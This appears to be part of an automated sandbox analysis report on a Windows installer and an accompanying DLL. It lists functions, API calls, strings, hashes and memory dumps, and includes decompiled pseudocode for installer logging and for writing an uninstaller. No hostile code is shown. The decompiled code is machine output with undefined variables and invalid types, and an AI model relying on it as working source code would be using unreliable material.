                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64E8C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 210memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64E938
                                                                                                                                                      • Part of subcall function 6E6262D0: _DebugHeapAllocator.LIBCPMTD ref: 6E6262DE
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64E9B2
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64EA15
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64EA81
                                                                                                                                                      • Part of subcall function 6E6259F0: _DebugHeapAllocator.LIBCPMTD ref: 6E625A28
                                                                                                                                                      • Part of subcall function 6E6259F0: _DebugHeapAllocator.LIBCPMTD ref: 6E625A6A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64EAE7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                    • String ID: Error %d:$File: %s$Line: %u
                                                                                                                                                    • API String ID: 1698587239-3492824664
                                                                                                                                                    • Opcode ID: 6eda9f41eda220462ff553f3cbc604df15ab2af5e751e650d73fe520d500ed9f
                                                                                                                                                    • Instruction ID: fd4ab78dcd782c7a72886ba5c4d3867d0fde1f607402b3e304c271de3d00e857
                                                                                                                                                    • Opcode Fuzzy Hash: 6eda9f41eda220462ff553f3cbc604df15ab2af5e751e650d73fe520d500ed9f
                                                                                                                                                    • Instruction Fuzzy Hash: 6A917171D00148EFCF04CFD4D950AEEBBB8BF58314F148569E5156B291DB34AA09CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E623980, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 172memoryfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E623A15
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E623A28
                                                                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,?,?,?,?,-00000010,-00000010,00000000,3920FDCC), ref: 6E623B51
                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,?,?,-00000010,-00000010,00000000,3920FDCC), ref: 6E623B66
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$CopyErrorFileLast
                                                                                                                                                    • String ID: %s\%s$%s\%s$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$PkgDir$PkgDir
                                                                                                                                                    • API String ID: 2445141817-2795496647
                                                                                                                                                    • Opcode ID: 48488533ed7f10b72f622886fd6c5ab56abf9a90cb4b042d43d9c3e64fbc6ab6
                                                                                                                                                    • Instruction ID: f19fd39e4f0df491bb5449cc45f49db0f6ff462de5c4829e66d869c10fcb4c36
                                                                                                                                                    • Opcode Fuzzy Hash: 48488533ed7f10b72f622886fd6c5ab56abf9a90cb4b042d43d9c3e64fbc6ab6
                                                                                                                                                    • Instruction Fuzzy Hash: BD612770D00109EFDB04DBE4D954BEEBB78AF15318F508A69E4117B290DB756A04CFAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E621390, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6213CB
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E6213E3
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E621457
                                                                                                                                                      • Part of subcall function 6E6262D0: _DebugHeapAllocator.LIBCPMTD ref: 6E6262DE
                                                                                                                                                      • Part of subcall function 6E625C30: _DebugHeapAllocator.LIBCPMTD ref: 6E625C67
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E6214A5
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6214AE
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E621531
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62153A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E621579
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                      • Part of subcall function 6E6259F0: _DebugHeapAllocator.LIBCPMTD ref: 6E625A28
                                                                                                                                                      • Part of subcall function 6E6259F0: _DebugHeapAllocator.LIBCPMTD ref: 6E625A6A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork$std::ios_base::good
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 100152506-2457274529
                                                                                                                                                    • Opcode ID: 96606e21888fd4340da41feb99e5793e87f1478c33dd816a090c50fbbff9ad81
                                                                                                                                                    • Instruction ID: 32faabf777de963b1613f368e4213aac8eec7e874b2367f5f18a932a7245232f
                                                                                                                                                    • Opcode Fuzzy Hash: 96606e21888fd4340da41feb99e5793e87f1478c33dd816a090c50fbbff9ad81
                                                                                                                                                    • Instruction Fuzzy Hash: 66614E71C1415CEECB04DFE4D950BEEBBB8AF14314F504969D416BB294EB742A08CFA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E636BE0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 126COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E636E10: task.LIBCPMTD ref: 6E636F0E
                                                                                                                                                      • Part of subcall function 6E636E10: task.LIBCPMTD ref: 6E636F1A
                                                                                                                                                      • Part of subcall function 6E636E10: task.LIBCPMTD ref: 6E636F26
                                                                                                                                                      • Part of subcall function 6E636E10: task.LIBCPMTD ref: 6E636F35
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B3A
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B46
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B52
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B61
                                                                                                                                                    • task.LIBCPMTD ref: 6E636D2C
                                                                                                                                                    • task.LIBCPMTD ref: 6E636D38
                                                                                                                                                    • task.LIBCPMTD ref: 6E636D47
                                                                                                                                                    • task.LIBCPMTD ref: 6E636D56
                                                                                                                                                    • task.LIBCPMTD ref: 6E636D65
                                                                                                                                                    • task.LIBCPMTD ref: 6E636D71
                                                                                                                                                    • task.LIBCPMTD ref: 6E636DAA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task
                                                                                                                                                    • String ID: parse error$parse_error
                                                                                                                                                    • API String ID: 1384045349-1820534363
                                                                                                                                                    • Opcode ID: 2cff4dff4fe7e20642e74c91111a66e5d9060b09661083ff44809c11960cc81c
                                                                                                                                                    • Instruction ID: d7fdc3ff13f336112a9146c3d1dbc298981b6c25412d170a924a75f032a3a48e
                                                                                                                                                    • Opcode Fuzzy Hash: 2cff4dff4fe7e20642e74c91111a66e5d9060b09661083ff44809c11960cc81c
                                                                                                                                                    • Instruction Fuzzy Hash: 4A510971D00258EBDB54CFA8DC40FDDBBB8BB58304F1085E9E40AA7280EB705A48DF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406113, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406113(void* __ecx, void _a4) {
				long _v8;
				void* _t8;
				long _t11;

				if(_a4 == 0) {
					__eflags =  *0x46d204; // 0x0
					if(__eflags != 0) {
						__eflags =  *0x476240;
						if( *0x476240 == 0) {
							L11:
							__eflags =  *0x40c058 - 0xffffffff;
							if( *0x40c058 != 0xffffffff) {
								goto L12;
							}
						} else {
							__eflags =  *0x40c058 - 0xffffffff;
							if( *0x40c058 != 0xffffffff) {
								L12:
								lstrcatW(0x46d220, L"\r\n");
								_t11 = lstrlenW(0x46d220) + _t10;
								__eflags = _t11;
								_t8 = WriteFile( *0x40c058, 0x46d220, _t11,  &_a4, 0);
							} else {
								_a4 = GetFileAttributesW(0x476240);
								_t8 = E00405E7C(0x476240, 0x40000000, 4);
								 *0x40c058 = _t8;
								__eflags = _t8 - 0xffffffff;
								if(_t8 != 0xffffffff) {
									__eflags = _a4 - 0xffffffff;
									if(_a4 == 0xffffffff) {
										_a4 = 0xfeff;
										WriteFile(_t8,  &_a4, 2,  &_v8, 0);
										_t8 =  *0x40c058; // 0xffffffff
									}
									_t8 = SetFilePointer(_t8, 0, 0, 2);
									goto L11;
								}
							}
						}
					}
				} else {
					_t8 =  *0x40c058; // 0xffffffff
					if(_t8 != 0xffffffff) {
						_t8 = CloseHandle(_t8);
					}
					 *0x40c058 =  *0x40c058 | 0xffffffff;
				}
				return _t8;
			}






                                                                                                                                                    0x0040611d
                                                                                                                                                    0x0040613c
                                                                                                                                                    0x00406142
                                                                                                                                                    0x00406150
                                                                                                                                                    0x00406157
                                                                                                                                                    0x004061b3
                                                                                                                                                    0x004061b3
                                                                                                                                                    0x004061ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406159
                                                                                                                                                    0x00406159
                                                                                                                                                    0x00406160
                                                                                                                                                    0x004061bc
                                                                                                                                                    0x004061c7
                                                                                                                                                    0x004061d9
                                                                                                                                                    0x004061d9
                                                                                                                                                    0x004061e3
                                                                                                                                                    0x00406162
                                                                                                                                                    0x00406176
                                                                                                                                                    0x00406179
                                                                                                                                                    0x0040617e
                                                                                                                                                    0x00406183
                                                                                                                                                    0x00406186
                                                                                                                                                    0x00406188
                                                                                                                                                    0x0040618c
                                                                                                                                                    0x0040619a
                                                                                                                                                    0x004061a1
                                                                                                                                                    0x004061a3
                                                                                                                                                    0x004061a3
                                                                                                                                                    0x004061ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004061ad
                                                                                                                                                    0x00406186
                                                                                                                                                    0x00406160
                                                                                                                                                    0x004061e6
                                                                                                                                                    0x0040611f
                                                                                                                                                    0x0040611f
                                                                                                                                                    0x00406127
                                                                                                                                                    0x0040612a
                                                                                                                                                    0x0040612a
                                                                                                                                                    0x00406130
                                                                                                                                                    0x00406130
                                                                                                                                                    0x004061e9

                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),0040A678), ref: 004061C7
                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                    • String ID: @bG$RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\")
                                                                                                                                                    • API String ID: 3734993849-684399923
                                                                                                                                                    • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                    • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                    • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                    • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E670A8C, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                                    • String ID: :$f$f$f$p$p$p
                                                                                                                                                    • API String ID: 1302938615-1434680307
                                                                                                                                                    • Opcode ID: 84efc6adf13da1c8627494b6acf02aa441c5aebb83018cf309e33a6b60a97957
                                                                                                                                                    • Instruction ID: 8450afd8f47cd68a4140cee4eb01010ce204a4a9156eb41747e6bc9cad3889db
                                                                                                                                                    • Opcode Fuzzy Hash: 84efc6adf13da1c8627494b6acf02aa441c5aebb83018cf309e33a6b60a97957
                                                                                                                                                    • Instruction Fuzzy Hash: F202C275A0024ACBEFB0CFE5C4946DEB7B2FB01B18F604516D4247B684E7719E88CB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E643AA0, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E636FB0: task.LIBCPMTD ref: 6E63702F
                                                                                                                                                      • Part of subcall function 6E636FB0: task.LIBCPMTD ref: 6E63703B
                                                                                                                                                      • Part of subcall function 6E636FB0: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E637050
                                                                                                                                                      • Part of subcall function 6E636FB0: task.LIBCPMTD ref: 6E637068
                                                                                                                                                      • Part of subcall function 6E662DFE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    • task.LIBCPMTD ref: 6E643B1D
                                                                                                                                                    • List.LIBCMTD ref: 6E643B5A
                                                                                                                                                    • task.LIBCPMTD ref: 6E643BAD
                                                                                                                                                    Strings
                                                                                                                                                    • iterator does not fit current value, xrefs: 6E643AD6
                                                                                                                                                    • cannot use erase() with , xrefs: 6E643C8B
                                                                                                                                                    • iterator out of range, xrefs: 6E643B66
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorDispatcherExceptionListUser
                                                                                                                                                    • String ID: cannot use erase() with $iterator does not fit current value$iterator out of range
                                                                                                                                                    • API String ID: 898106873-3306149458
                                                                                                                                                    • Opcode ID: 8d7387025b108df9a13e4fce3dc923f15888805d47eba74f0e0fa3d569132ce2
                                                                                                                                                    • Instruction ID: fa5bf3e55ed9ecb2b9c2135ad2571fa4a9d79df51fbbcbd3e7bd88e608eea256
                                                                                                                                                    • Opcode Fuzzy Hash: 8d7387025b108df9a13e4fce3dc923f15888805d47eba74f0e0fa3d569132ce2
                                                                                                                                                    • Instruction Fuzzy Hash: C3711971900119DFCB24DFE4D890FEEB7B9BF58304F2086A9E515AB291EB306A44DF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65053C, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 118libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(Comctl32.dll), ref: 6E6506D2
                                                                                                                                                      • Part of subcall function 6E650498: GetProcAddress.KERNEL32(?,?), ref: 6E6504C6
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6E6505EC
                                                                                                                                                    • SetLastError.KERNEL32(0000006F), ref: 6E650600
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E650657
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
                                                                                                                                                    • String ID: $@$Comctl32.dll$GetModuleHandleExW
                                                                                                                                                    • API String ID: 3640817601-4183358198
                                                                                                                                                    • Opcode ID: f08e81ab9af6e84c4a2fbe5469d5ba4805733f250eaf9a2acb91bc5b6f924394
                                                                                                                                                    • Instruction ID: 576c563a3a6976bf1b172c96eca180ef07461364a9e54fbb447b8ac04d838dea
                                                                                                                                                    • Opcode Fuzzy Hash: f08e81ab9af6e84c4a2fbe5469d5ba4805733f250eaf9a2acb91bc5b6f924394
                                                                                                                                                    • Instruction Fuzzy Hash: E441D771A4061BAADBE08FE5CC58BDE77B8EB82718F100557E415E6380EB74CA90DF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402E55, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E00402E55(struct _OVERLAPPED* __ebx) {
				void* _t29;
				long _t35;
				struct _OVERLAPPED* _t51;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t63;

				_t51 = __ebx;
				 *(_t63 - 0x10) = 0xfffffd66;
				_t57 = E0040145C(_t54, 0xfffffff0);
				 *(_t63 - 0x14) = _t26;
				if(E00405D51(_t57) == 0) {
					E0040145C(_t54, 0xffffffed);
				}
				E00405E5C(_t57);
				_t29 = E00405E7C(_t57, 0x40000000, 2);
				 *(_t63 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					_t35 =  *0x47eb0c;
					 *(_t63 - 0x44) = _t35;
					_t56 = GlobalAlloc(0x40, _t35);
					if(_t56 != _t51) {
						E00403368(_t51);
						E00403336(_t56,  *(_t63 - 0x44));
						_t61 = GlobalAlloc(0x40,  *(_t63 - 0x24));
						 *(_t63 - 0x10) = _t61;
						if(_t61 != _t51) {
							E0040337F( *((intOrPtr*)(_t63 - 0x28)), _t51, _t61,  *(_t63 - 0x24));
							while( *_t61 != _t51) {
								_t53 =  *_t61;
								_t62 = _t61 + 8;
								 *(_t63 - 0x38) =  *_t61;
								E00405E38( *((intOrPtr*)(_t61 + 4)) + _t56, _t62, _t53);
								_t61 = _t62 +  *(_t63 - 0x38);
							}
							GlobalFree( *(_t63 - 0x10));
						}
						WriteFile( *(_t63 + 8), _t56,  *(_t63 - 0x44), _t63 - 8, _t51);
						GlobalFree(_t56);
						 *(_t63 - 0x10) = E0040337F(0xffffffff,  *(_t63 + 8), _t51, _t51);
					}
					CloseHandle( *(_t63 + 8));
				}
				_push( *(_t63 - 0x14));
				E004062CF(L"created uninstaller: %d, \"%s\"",  *(_t63 - 0x10));
				_t58 = 0xfffffff3;
				if( *(_t63 - 0x10) < _t51) {
					_t58 = 0xffffffef;
					DeleteFileW( *(_t63 - 0x14));
					 *((intOrPtr*)(_t63 - 4)) = 1;
				}
				E00401435(_t58);
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t63 - 4));
				return 0;
			}












                                                                                                                                                    0x00402e55
                                                                                                                                                    0x00402e57
                                                                                                                                                    0x00402e63
                                                                                                                                                    0x00402e66
                                                                                                                                                    0x00402e70
                                                                                                                                                    0x00402e74
                                                                                                                                                    0x00402e74
                                                                                                                                                    0x00402e7a
                                                                                                                                                    0x00402e87
                                                                                                                                                    0x00402e8c
                                                                                                                                                    0x00402e92
                                                                                                                                                    0x00402e98
                                                                                                                                                    0x00402ea6
                                                                                                                                                    0x00402eab
                                                                                                                                                    0x00402eaf
                                                                                                                                                    0x00402eb2
                                                                                                                                                    0x00402ebb
                                                                                                                                                    0x00402ec7
                                                                                                                                                    0x00402ec9
                                                                                                                                                    0x00402ece
                                                                                                                                                    0x00402ed8
                                                                                                                                                    0x00402ef7
                                                                                                                                                    0x00402edf
                                                                                                                                                    0x00402ee5
                                                                                                                                                    0x00402eec
                                                                                                                                                    0x00402eef
                                                                                                                                                    0x00402ef4
                                                                                                                                                    0x00402ef4
                                                                                                                                                    0x00402efe
                                                                                                                                                    0x00402efe
                                                                                                                                                    0x00402f10
                                                                                                                                                    0x00402f17
                                                                                                                                                    0x00402f29
                                                                                                                                                    0x00402f29
                                                                                                                                                    0x00402f2f
                                                                                                                                                    0x00402f2f
                                                                                                                                                    0x00402f35
                                                                                                                                                    0x00402f40
                                                                                                                                                    0x00402f4a
                                                                                                                                                    0x00402f4e
                                                                                                                                                    0x00402f52
                                                                                                                                                    0x00402f56
                                                                                                                                                    0x00402f5c
                                                                                                                                                    0x00402f5c
                                                                                                                                                    0x00402f64
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00402EFE
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00402F17
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                    Strings
                                                                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                                                                    • Opcode ID: 425adf467cb2c86b17273659995b3ed8045270cb1554a1bec104c33d48d0e7ae
                                                                                                                                                    • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                    • Opcode Fuzzy Hash: 425adf467cb2c86b17273659995b3ed8045270cb1554a1bec104c33d48d0e7ae
                                                                                                                                                    • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

